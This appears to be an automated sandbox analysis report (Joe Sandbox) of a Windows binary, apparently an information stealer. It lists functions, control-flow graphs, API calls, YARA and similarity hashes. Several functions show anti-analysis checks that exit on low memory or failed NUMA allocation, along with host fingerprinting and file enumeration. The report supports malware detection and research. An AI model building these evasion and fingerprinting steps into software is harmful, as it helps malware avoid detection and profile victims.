                                  control_flow_graph 2782 2d2740-2d2783 GetWindowsDirectoryA 2783 2d278c-2d27ea GetVolumeInformationA 2782->2783 2784 2d2785 2782->2784 2785 2d27ec-2d27f2 2783->2785 2784->2783 2786 2d2809-2d2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 2d27f4-2d2807 2785->2787 2788 2d2826-2d2844 wsprintfA 2786->2788 2789 2d2822-2d2824 2786->2789 2787->2785 2790 2d285b-2d2872 call 2d71e0 2788->2790 2789->2790
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 002D277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,002C93B6,00000000,00000000,00000000,00000000), ref: 002D27AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002D280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D2816
                                  • wsprintfA.USER32 ref: 002D283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409
                                  • Opcode ID: f0010a5828a755046e28ea6103baaed77648aaa7fd57e07876171348a3a73d97
                                  • Instruction ID: 5c2d7f126cbcc73826e73fdc0db702428caed0af79bbfad49296ab03e30b7043
                                  • Opcode Fuzzy Hash: f0010a5828a755046e28ea6103baaed77648aaa7fd57e07876171348a3a73d97
                                  • Instruction Fuzzy Hash: 42316FB19082499BCB14CFB88A859EFFFBCEF58710F10416EE505E7651E2748E448BB5
                                  Function 002B4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2793 2b4bc0-2b4bce 2794 2b4bd0-2b4bd5 2793->2794 2794->2794 2795 2b4bd7-2b4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 2b2a20 2794->2795
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 002B4BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 002B4C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 002B4C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 002B4C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 002B4C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 40f49154f379b93e6227e59c0aa57a450260f87be44428701bd417b292751c49
                                  • Instruction ID: 6b059c36153b39bff6c526c1acc254504c45798e7679efe17d02e752c1b43a54
                                  • Opcode Fuzzy Hash: 40f49154f379b93e6227e59c0aa57a450260f87be44428701bd417b292751c49
                                  • Instruction Fuzzy Hash: D2012D71D00218ABDF10DFA8EC45B9EBBB8EB08364F00416AF958E7390DB7459048FD4
                                  Function 002B1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2798 2b1030-2b1055 GetCurrentProcess VirtualAllocExNuma 2799 2b105e-2b107b VirtualAlloc 2798->2799 2800 2b1057-2b1058 ExitProcess 2798->2800 2801 2b107d-2b1080 2799->2801 2802 2b1082-2b1088 2799->2802 2801->2802 2803 2b108a-2b10ab VirtualFree 2802->2803 2804 2b10b1-2b10b6 2802->2804 2803->2804
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002B1046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 002B104D
                                  • ExitProcess.KERNEL32 ref: 002B1058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002B106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 002B10AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: 2eb46f719faa66fd31d7fc8e90cca8f9e2be879644baae05661dae8c7c34f403
                                  • Instruction ID: 2cda7500e26a028a981a9d576527c8c1ad7e075e520de59a0ce1dab0f81a5d6f
                                  • Opcode Fuzzy Hash: 2eb46f719faa66fd31d7fc8e90cca8f9e2be879644baae05661dae8c7c34f403
                                  • Instruction Fuzzy Hash: B00149717402447BE7201A656C99F9B77ACA740B01F604424F704EB2C1D971ED008528
                                  Function 002CEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2805 2cee90-2ceeb5 call 2b2930 2808 2ceec9-2ceecd call 2b6c40 2805->2808 2809 2ceeb7-2ceebf 2805->2809 2812 2ceed2-2ceee8 StrCmpCA 2808->2812 2809->2808 2810 2ceec1-2ceec3 lstrcpy 2809->2810 2810->2808 2813 2ceeea-2cef02 call 2b2a20 call 2b2930 2812->2813 2814 2cef11-2cef18 call 2b2a20 2812->2814 2824 2cef04-2cef0c 2813->2824 2825 2cef45-2cefa0 call 2b2a20 * 10 2813->2825 2819 2cef20-2cef28 2814->2819 2819->2819 2821 2cef2a-2cef37 call 2b2930 2819->2821 2821->2825 2829 2cef39 2821->2829 2824->2825 2828 2cef0e-2cef0f 2824->2828 2831 2cef3e-2cef3f lstrcpy 2828->2831 2829->2831 2831->2825
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CEEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 002CEEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 002CEF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: 523aaf9134f34eb257bab492fe0d20791106b17604b1fb871a86a93481eb6b10
                                  • Instruction ID: 75833df76ecca48c57fb027c3d9a3132892d2f447d8c67c6e72403354ad23d5f
                                  • Opcode Fuzzy Hash: 523aaf9134f34eb257bab492fe0d20791106b17604b1fb871a86a93481eb6b10
                                  • Instruction Fuzzy Hash: AB21F8306302469BDB21FF79DC46BDA77A4AF10340F155568B88AEB652DA30EC288B90
                                  Function 002B10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2886 2b10c0-2b10cb 2887 2b10d0-2b10dc 2886->2887 2889 2b10de-2b10f3 GlobalMemoryStatusEx 2887->2889 2890 2b1112-2b1114 ExitProcess 2889->2890 2891 2b10f5-2b1106 2889->2891 2892 2b111a-2b111d 2891->2892 2893 2b1108 2891->2893 2893->2890 2894 2b110a-2b1110 2893->2894 2894->2890 2894->2892
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 7d2d6c20041bc9a4071947b53296cc43a0666e7651139e34a8bca39f0c5c1144
                                  • Instruction ID: 209fc20736e85658416fc1488079d78274a26cc6f07837975171b13cf31d86f0
                                  • Opcode Fuzzy Hash: 7d2d6c20041bc9a4071947b53296cc43a0666e7651139e34a8bca39f0c5c1144
                                  • Instruction Fuzzy Hash: 1CF0E97013828947E7106E689865369F7D8EB003D0F900929DE9AC2181E270C8B0812B
                                  Function 002C8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2895 2c8c88-2c8cc4 StrCmpCA 2898 2c8ccd-2c8ce6 2895->2898 2899 2c8cc6-2c8cc7 ExitProcess 2895->2899 2901 2c8cec-2c8cf1 2898->2901 2902 2c8ee2-2c8eef call 2b2a20 2898->2902 2903 2c8cf6-2c8cf9 2901->2903 2906 2c8cff 2903->2906 2907 2c8ec3-2c8edc 2903->2907 2908 2c8e6f-2c8e7d StrCmpCA 2906->2908 2909 2c8e88-2c8e9a lstrlen 2906->2909 2910 2c8d84-2c8d92 StrCmpCA 2906->2910 2911 2c8da4-2c8db8 StrCmpCA 2906->2911 2912 2c8d06-2c8d15 lstrlen 2906->2912 2913 2c8dbd-2c8dcb StrCmpCA 2906->2913 2914 2c8ddd-2c8deb StrCmpCA 2906->2914 2915 2c8dfd-2c8e0b StrCmpCA 2906->2915 2916 2c8e1d-2c8e2b StrCmpCA 2906->2916 2917 2c8e3d-2c8e4b StrCmpCA 2906->2917 2918 2c8d5a-2c8d69 lstrlen 2906->2918 2919 2c8e56-2c8e64 StrCmpCA 2906->2919 2920 2c8d30-2c8d3f lstrlen 2906->2920 2907->2902 2945 2c8cf3 2907->2945 2908->2907 2921 2c8e7f-2c8e86 2908->2921 2922 2c8e9c-2c8ea1 call 2b2a20 2909->2922 2923 2c8ea4-2c8eb0 call 2b2930 2909->2923 2910->2907 2929 2c8d98-2c8d9f 2910->2929 2911->2907 2934 2c8d1f-2c8d2b call 2b2930 2912->2934 2935 2c8d17-2c8d1c call 2b2a20 2912->2935 2913->2907 2930 2c8dd1-2c8dd8 2913->2930 2914->2907 2931 2c8df1-2c8df8 2914->2931 2915->2907 2932 2c8e11-2c8e18 2915->2932 2916->2907 2933 2c8e31-2c8e38 2916->2933 2917->2907 2936 2c8e4d-2c8e54 2917->2936 2926 2c8d6b-2c8d70 call 2b2a20 2918->2926 2927 2c8d73-2c8d7f call 2b2930 2918->2927 2919->2907 2937 2c8e66-2c8e6d 2919->2937 2924 2c8d49-2c8d55 call 2b2930 2920->2924 2925 2c8d41-2c8d46 call 2b2a20 2920->2925 2921->2907 2922->2923 2955 2c8eb3-2c8eb5 2923->2955 2924->2955 2925->2924 2926->2927 2927->2955 2929->2907 2930->2907 2931->2907 2932->2907 2933->2907 2934->2955 2935->2934 2936->2907 2937->2907 2945->2903 2955->2907 2956 2c8eb7-2c8eb9 2955->2956 2956->2907 2957 2c8ebb-2c8ebd lstrcpy 2956->2957 2957->2907
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 6e8d705228d1b36886878d72f8e818b65e759852dc9ce98ec536efeba7fd54fd
                                  • Instruction ID: 562a5cadb6cf458ae966f83da9cf99bb134d50eaff98d207acb7780b8e834e52
                                  • Opcode Fuzzy Hash: 6e8d705228d1b36886878d72f8e818b65e759852dc9ce98ec536efeba7fd54fd
                                  • Instruction Fuzzy Hash: E1E0D86010038AEBD7106BB6D885D467B68EF45700F44C13DBA009B152EE34AD04C759
                                  Function 002D2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2958 2d2ad0-2d2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 2d2b44-2d2b59 2958->2959 2960 2d2b24-2d2b36 2958->2960
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 002D2AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D2B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 002D2B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 2d0de507371f2f307014e4deb298abace0b73eeb2346de99de96ab9b6df954bd
                                  • Instruction ID: f3846f7a43a0ee1dc7e3df8f6704ab97c13857c4e7d1aa8462fc4b1ad354ff54
                                  • Opcode Fuzzy Hash: 2d0de507371f2f307014e4deb298abace0b73eeb2346de99de96ab9b6df954bd
                                  • Instruction Fuzzy Hash: D801AD72A44248ABC710DF99EC85BAEF7B8FB45B21F40026BF919E3780D7741D0486A5

                                  Non-executed Functions

                                  Function 002C2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C2402
                                  • lstrlen.KERNEL32(\*.*), ref: 002C240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 002C2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: fa1ce0d08fa4b99fc4ed678715d2096d35eb6417266d5b3e706cb3162fc158c1
                                  • Instruction ID: 6f103893a3c40366864adeda9709fb5c1d7bd301603fd408b82b9de04b910cff
                                  • Opcode Fuzzy Hash: fa1ce0d08fa4b99fc4ed678715d2096d35eb6417266d5b3e706cb3162fc158c1
                                  • Instruction Fuzzy Hash: 3CA28B31921757DBDB21EF64CD88FAEB7B9AF04740F144228B849A7252DF34DD298B90
                                  Function 002B16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B16E2
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B176C
